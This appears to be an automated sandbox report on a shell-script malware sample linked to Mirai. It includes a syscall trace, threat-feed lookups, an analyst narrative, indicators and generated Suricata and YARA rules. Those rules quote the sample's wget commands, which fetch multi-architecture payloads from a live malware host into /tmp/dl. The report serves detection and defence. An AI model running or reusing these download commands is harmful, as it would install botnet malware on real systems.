/usr/share/locale/en.UTF-8/LC_MESSAGES/wget.mo
|
- pid 686 | 22:10:40.692040 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/wget.mo
|
- pid 686 | 22:10:40.692501 |
| read |
/usr/share/locale/en/LC_MESSAGES/wget.mo
|
- pid 686 | 22:10:40.692861 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget.mo
|
- pid 686 | 22:10:40.693315 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget.mo
|
- pid 686 | 22:10:40.693684 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget.mo
|
- pid 686 | 22:10:40.694042 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget.mo
|
- pid 686 | 22:10:40.694454 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget.mo
|
- pid 686 | 22:10:40.694813 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/wget.mo
|
- pid 686 | 22:10:40.695175 |
| read |
/etc/nsswitch.conf
|
- pid 686 | 22:10:40.698465 |
| read |
/etc/host.conf
|
- pid 686 | 22:10:40.700547 |
| read |
/etc/resolv.conf
|
- pid 686 | 22:10:40.702099 |
| read |
/etc/hosts
|
- pid 686 | 22:10:40.703674 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/libc.mo
|
- pid 686 | 22:10:40.724434 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/libc.mo
|
- pid 686 | 22:10:40.724684 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/libc.mo
|
- pid 686 | 22:10:40.724922 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/libc.mo
|
- pid 686 | 22:10:40.725165 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/libc.mo
|
- pid 686 | 22:10:40.725453 |
| read |
/usr/share/locale/en/LC_MESSAGES/libc.mo
|
- pid 686 | 22:10:40.725691 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/libc.mo
|
- pid 686 | 22:10:40.725929 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/libc.mo
|
- pid 686 | 22:10:40.726166 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/libc.mo
|
- pid 686 | 22:10:40.726429 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/libc.mo
|
- pid 686 | 22:10:40.726673 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/libc.mo
|
- pid 686 | 22:10:40.726910 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/libc.mo
|
- pid 686 | 22:10:40.727146 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 686 | 22:10:40.727829 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 686 | 22:10:40.728168 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/wget-gnulib.mo
|
- pid 686 | 22:10:40.728416 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 686 | 22:10:40.728754 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 686 | 22:10:40.729092 |
| read |
/usr/share/locale/en/LC_MESSAGES/wget-gnulib.mo
|
- pid 686 | 22:10:40.729346 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 686 | 22:10:40.729688 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 686 | 22:10:40.730033 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget-gnulib.mo
|
- pid 686 | 22:10:40.730369 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 686 | 22:10:40.730720 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 686 | 22:10:40.731057 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/wget-gnulib.mo
|
- pid 686 | 22:10:40.731546 |
| create |
/dev/null
|
- pid 681 | 22:10:40.735171 |
| read |
/etc/ld.so.cache
|
- pid 687 | 22:10:40.739369 |
| read |
/lib/x86_64-linux-gnu/libpcre2-8.so.0
|
- pid 687 | 22:10:40.740520 |
| read |
/lib/x86_64-linux-gnu/libuuid.so.1
|
- pid 687 | 22:10:40.742796 |
| read |
/lib/x86_64-linux-gnu/libidn2.so.0
|
- pid 687 | 22:10:40.745294 |
| read |
/lib/x86_64-linux-gnu/libssl.so.3
|
- pid 687 | 22:10:40.747576 |
| read |
/lib/x86_64-linux-gnu/libcrypto.so.3
|
- pid 687 | 22:10:40.749886 |
| read |
/lib/x86_64-linux-gnu/libz.so.1
|
- pid 687 | 22:10:40.752507 |
| read |
/lib/x86_64-linux-gnu/libpsl.so.5
|
- pid 687 | 22:10:40.755148 |
| read |
/lib/x86_64-linux-gnu/libc.so.6
|
- pid 687 | 22:10:40.757343 |
| read |
/lib/x86_64-linux-gnu/libunistring.so.5
|
- pid 687 | 22:10:40.760819 |
| read |
/usr/lib/locale/locale-archive
|
- pid 687 | 22:10:40.771890 |
| read |
/etc/wgetrc
|
- pid 687 | 22:10:40.773803 |
| create |
/tmp/dl/main_powerpc
|
- pid 687 | 22:10:40.776800 |
| read |
/etc/localtime
|
- pid 687 | 22:10:40.780275 |
| read |
/usr/share/locale/locale.alias
|
- pid 687 | 22:10:40.783823 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget.mo
|
- pid 687 | 22:10:40.785951 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget.mo
|
- pid 687 | 22:10:40.786403 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/wget.mo
|
- pid 687 | 22:10:40.786829 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget.mo
|
- pid 687 | 22:10:40.787348 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/wget.mo
|
- pid 687 | 22:10:40.787825 |
| read |
/usr/share/locale/en/LC_MESSAGES/wget.mo
|
- pid 687 | 22:10:40.788269 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget.mo
|
- pid 687 | 22:10:40.788677 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget.mo
|
- pid 687 | 22:10:40.789083 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget.mo
|
- pid 687 | 22:10:40.789466 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget.mo
|
- pid 687 | 22:10:40.789877 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget.mo
|
- pid 687 | 22:10:40.790314 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/wget.mo
|
- pid 687 | 22:10:40.790759 |
| read |
/etc/nsswitch.conf
|
- pid 687 | 22:10:40.795414 |
| read |
/etc/host.conf
|
- pid 687 | 22:10:40.797767 |
| read |
/etc/resolv.conf
|
- pid 687 | 22:10:40.799545 |
| read |
/etc/hosts
|
- pid 687 | 22:10:40.801285 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/libc.mo
|
- pid 687 | 22:10:40.822207 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/libc.mo
|
- pid 687 | 22:10:40.822581 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/libc.mo
|
- pid 687 | 22:10:40.822862 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/libc.mo
|
- pid 687 | 22:10:40.823136 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/libc.mo
|
- pid 687 | 22:10:40.823490 |
| read |
/usr/share/locale/en/LC_MESSAGES/libc.mo
|
- pid 687 | 22:10:40.823765 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/libc.mo
|
- pid 687 | 22:10:40.824042 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/libc.mo
|
- pid 687 | 22:10:40.824425 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/libc.mo
|
- pid 687 | 22:10:40.824700 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/libc.mo
|
- pid 687 | 22:10:40.824978 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/libc.mo
|
- pid 687 | 22:10:40.825309 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/libc.mo
|
- pid 687 | 22:10:40.825763 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 687 | 22:10:40.826555 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 687 | 22:10:40.827109 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/wget-gnulib.mo
|
- pid 687 | 22:10:40.827599 |
| read |
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 687 | 22:10:40.827986 |
| read |
/usr/share/locale/en.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 687 | 22:10:40.828327 |
| read |
/usr/share/locale/en/LC_MESSAGES/wget-gnulib.mo
|
- pid 687 | 22:10:40.828725 |
| read |
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 687 | 22:10:40.829107 |
| read |
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 687 | 22:10:40.829560 |
| read |
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget-gnulib.mo
|
- pid 687 | 22:10:40.829942 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
|
- pid 687 | 22:10:40.830396 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget-gnulib.mo
|
- pid 687 | 22:10:40.830812 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/wget-gnulib.mo
|
- pid 687 | 22:10:40.831195 |
| create |
/dev/null
|
- pid 681 | 22:10:40.835071 |
| read |
/etc/ld.so.cache
|
- pid 688 | 22:10:40.839312 |
| read |
/lib/x86_64-linux-gnu/libpcre2-8.so.0
|
- pid 688 | 22:10:40.840560 |
| read |
/lib/x86_64-linux-gnu/libuuid.so.1
|
- pid 688 | 22:10:40.842994 |
| read |
/lib/x86_64-linux-gnu/libidn2.so.0
|
- pid 688 | 22:10:40.845615 |
| read |
/lib/x86_64-linux-gnu/libssl.so.3
|
- pid 688 | 22:10:40.848136 |
| read |
/lib/x86_64-linux-gnu/libcrypto.so.3
|
- pid 688 | 22:10:40.850793 |
| read |
/lib/x86_64-linux-gnu/libz.so.1
|
- pid 688 | 22:10:40.853713 |
| read |
/lib/x86_64-linux-gnu/libpsl.so.5
|
- pid 688 | 22:10:40.856207 |
| read |
/lib/x86_64-linux-gnu/libc.so.6
|
- pid 688 | 22:10:40.858871 |
No operations match your filter.
File reputation
2 of 7 listed| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| MalwareBazaar | File hash | known sample | sh | live lookup |
| MalwareBazaar hash feed | File hash | listed | malwarebazaar: Mirai | 2,535 records 6 minutes ago |
| VirusTotal | File hash | cannot access | rate limited (free-tier quota) | live lookup |
| filescan.io | File hash | no detections | - | live lookup |
| MalwareBazaar ransomware feed | File hash | clean | not in feed | 8,271 records 4 hours ago |
| ThreatFox hash IOCs | File hash | clean | not in feed | 1,632 records 6 minutes ago |
| URLhaus payload hashes | File hash | clean | not in feed | 1,474 records 6 minutes ago |
Hash lookups only - the sample itself is never uploaded to any third party.
Network indicators
1 of 8 listed| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| URLhaus | IP / domain / URL | 13 indicators | aura[.]tcplegit[.]space, hxxp[://]aura[.]tcplegit[.]space/main_x86_64… | 5,155 records 6 minutes ago |
| blocklist.de | IP / domain / URL | clean | 7 observed indicators, none listed | 24.5k records 6 minutes ago |
| CINS Army | IP / domain / URL | clean | 7 observed indicators, none listed | 15k records 6 minutes ago |
| Emerging Threats | IP / domain / URL | clean | 7 observed indicators, none listed | 580 records 6 minutes ago |
| Feodo Tracker | IP / domain / URL | clean | 7 observed indicators, none listed | 5 records 6 minutes ago |
| IPsum | IP / domain / URL | clean | 7 observed indicators, none listed | 17.7k records 6 minutes ago |
| Phishing.Database | IP / domain / URL | clean | 7 observed indicators, none listed | 391.1k records 4 hours ago |
| ThreatFox | IP / domain / URL | clean | 7 observed indicators, none listed | 1,632 records 6 minutes ago |
TLS fingerprints
0 clear| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| abuse.ch JA3 blocklist | JA3 / JA4 | not checked | no TLS client fingerprint observed | 97 records 16 hours ago |
| SSL blocklist | JA3 / JA4 | not checked | no TLS client fingerprint observed | 10.7k records 6 minutes ago |
Detection rules
2 clear| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| Sigma rules | Behavior log | clean | - | 2,275 records 22 hours ago |
| YARA rules | Sample content | clean | no rule matched | 110 records 7 minutes ago |
Tooling catalogs
4 clear| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| LOLBAS | Process image paths | clean | 1 process image path, none masqueraded | 244 records 7 minutes ago |
| LOLBootloaders | File hash | clean | not a known vulnerable bootloader | 520 records 6 minutes ago |
| LOLDrivers | File hash | clean | not a known vulnerable driver | 2,306 records 6 minutes ago |
| LOLRMM | Names and domains | clean | 3 name/domain indicators checked, no remote-management tooling | 322 records 6 minutes ago |
IOC reputation
URLhaus / ThreatFox| Indicator | Source | Threat |
|---|---|---|
| hxxp[://]aura[.]tcplegit[.]space/main_x86_64 | URLhaus | malware_download |
| hxxp[://]aura[.]tcplegit[.]space/main_aarch64 | URLhaus | malware_download |
| hxxp[://]aura[.]tcplegit[.]space/main_mips | URLhaus | malware_download |
| hxxp[://]aura[.]tcplegit[.]space/main_arm | URLhaus | malware_download |
| hxxp[://]aura[.]tcplegit[.]space/main_powerpc | URLhaus | malware_download |
| hxxp[://]aura[.]tcplegit[.]space/main_sh4 | URLhaus | malware_download |
Analyst narrative
The analysis of the sample indicates that it executed successfully within the sandbox environment. The following kill-chain elements were observed: 1. **Initial Access**: The sample initiated execution via a script named `download_and_run.sh`, which suggests it may have been designed to download and execute additional payloads. 2. **Execution**: The sample executed a series of system calls, including `execve`, indicating that it was actively running commands. It spawned a process for the script and utilized various APIs to perform its operations. 3. **Persistence**: There were no specific indicators of persistence mechanisms observed in the analysis. The sample did not attempt to establish any long-term presence on the system. 4. **Defense Evasion**: The sample demonstrated behavior consistent with defense evasion techniques, such as modifying file and directory permissions, which is indicative of attempts to avoid detection. 5. **Command and Control (C2)**: The sample attempted to communicate with a remote server at the domain `aura.tcplegit.space`, as evidenced by DNS queries and the presence of URLs pointing to various executable files hosted on that domain. This suggests that the sample may have been designed to download additional payloads or exfiltrate data. 6. **Impact**: The impact of the sample is not fully determined, but the creation of multiple executable files in the `/tmp/dl/` directory indicates potential malicious intent, possibly to execute further actions on the compromised system. **Verdict Rationale**: The sample exhibited behaviors consistent with malicious activity, including execution of a script, network communication with a potentially malicious domain, and the creation of executable files. Therefore, it is assessed as potentially harmful.
Evasion analysis
No evasive checkpoints detected.
Network indicators
7| Severity | Type | Indicator | Description |
|---|---|---|---|
| info | url | http://aura.tcplegit.space/main_x86_64 | Extracted from the sample's strings |
| info | url | http://aura.tcplegit.space/main_aarch64 | Extracted from the sample's strings |
| info | url | http://aura.tcplegit.space/main_mips | Extracted from the sample's strings |
| info | url | http://aura.tcplegit.space/main_arm | Extracted from the sample's strings |
| info | url | http://aura.tcplegit.space/main_powerpc | Extracted from the sample's strings |
| info | url | http://aura.tcplegit.space/main_sh4 | Extracted from the sample's strings |
| info | domain | aura.tcplegit.space | Observed during analysis |
File indicators
8| Severity | Type | Indicator | Description |
|---|---|---|---|
| malicious | sample_sha256 | c1080d2170a7fbf9ff0a7c5a23fc706c029f55adac34e1b0ebd270cc63821b92 | Submitted sample (SHA256) |
| malicious | sample_md5 | 386497aed2e4b131a802098ff87c5cc2 | Submitted sample (MD5) |
| suspicious | dropped_file | /tmp/dl/main_x86_64 | Executable written to disk during execution |
| suspicious | dropped_file | /tmp/dl/main_aarch64 | Executable written to disk during execution |
| suspicious | dropped_file | /tmp/dl/main_mips | Executable written to disk during execution |
| suspicious | dropped_file | /tmp/dl/main_arm | Executable written to disk during execution |
| suspicious | dropped_file | /tmp/dl/main_powerpc | Executable written to disk during execution |
| suspicious | dropped_file | /tmp/dl/main_sh4 | Executable written to disk during execution |
MITRE ATT&CK
4 techniquesSigma detections
0 matches of 2275 rulesThe Sigma corpus was evaluated against this run's processes, registry, file, network, DNS and script activity. Nothing matched.
Generated rules
Suricata/Snort: auto_file_2386_suricata
Auto-generatedalert dns any any -> any any (msg:"sandbox auto scan 2386 C2 domain aura.tcplegit.space"; dns.query; content:"aura.tcplegit.space"; sid:15978176; rev:1;) alert http any any -> any any (msg:"sandbox auto scan 2386 C2 URL"; http.uri; content:"/main_x86_64"; sid:15978177; rev:1;) alert http any any -> any any (msg:"sandbox auto scan 2386 C2 URL"; http.uri; content:"/main_aarch64"; sid:15978178; rev:1;) alert http any any -> any any (msg:"sandbox auto scan 2386 C2 URL"; http.uri; content:"/main_mips"; sid:15978179; rev:1;) alert http any any -> any any (msg:"sandbox auto scan 2386 C2 URL"; http.uri; content:"/main_arm"; sid:15978180; rev:1;) alert http any any -> any any (msg:"sandbox auto scan 2386 C2 URL"; http.uri; content:"/main_powerpc"; sid:15978181; rev:1;) alert http any any -> any any (msg:"sandbox auto scan 2386 C2 URL"; http.uri; content:"/main_sh4"; sid:15978182; rev:1;)
YARA: auto_file_2386_yara
Auto-generatedrule auto_file_2386_yara
{
meta:
description = "Auto-generated from scan 2386"
author = "sandbox auto-generator"
anchors = "5 independent regions"
strings:
$s0 = "wget -O /tmp/dl/main_x86_64 http://aura.tcplegit.space/main_x86_64 2>/dev/null" ascii fullword
$s1 = "wget -O /tmp/dl/main_sh4 http://aura.tcplegit.space/main_sh4 2>/dev/null" ascii fullword
$s2 = "wget -O /tmp/dl/main_aarch64 http://aura.tcplegit.space/main_aarch64 2>/dev/null" ascii fullword
$s3 = "wget -O /tmp/dl/main_powerpc http://aura.tcplegit.space/main_powerpc 2>/dev/null" ascii fullword
$s4 = "wget -O /tmp/dl/main_mips http://aura.tcplegit.space/main_mips 2>/dev/null" ascii fullword
condition:
filesize < 65536 and all of them
}Extracted files
What came out of the sample: unpacked payloads, carved objects and captured memory. Each one is stored by content hash, so the same object extracted twice is the same row.
No extracted files
Nothing was unpacked or carved out of this sample. Packed samples, documents with embedded objects and installers are the ones that usually produce artifacts here.
Export & download
/s/2386The report downloads - PCAP and the SIEM/TIP exports - are a paid-plan feature. Sign in with a paid plan to export this report.
AI analysis report
An enterprise report with an AI-written executive summary, threat assessment, kill chain, and recommendations, plus the derived evidence (verdict, MITRE ATT&CK, network, file modifications, dropped files, IOCs) and screenshots. The AI narrative is built from derived analysis data only, so the raw sample never leaves the host (no-upload and AI-boundary preserved).
Headers
Body
Headers
Body
You are about to download the raw, live sample. It is real, potentially destructive malware and can harm your machine if opened or run. Only handle it inside an isolated analysis environment.
Delivered as a ZIP encrypted with the password infected so the bytes are never handled unprotected.
Report this analysis
Analysis reports are produced automatically from files, addresses and text submitted by visitors. If this one publishes your material, identifies you, or should not be public for any other reason, tell us why and an administrator will review it.
Public analyses of this file
1 run| Submitted | Environment | Verdict | Score |
|---|---|---|---|
| 2026-09-07 21:46 Shown below | Static analysis | Malicious | 92/100 |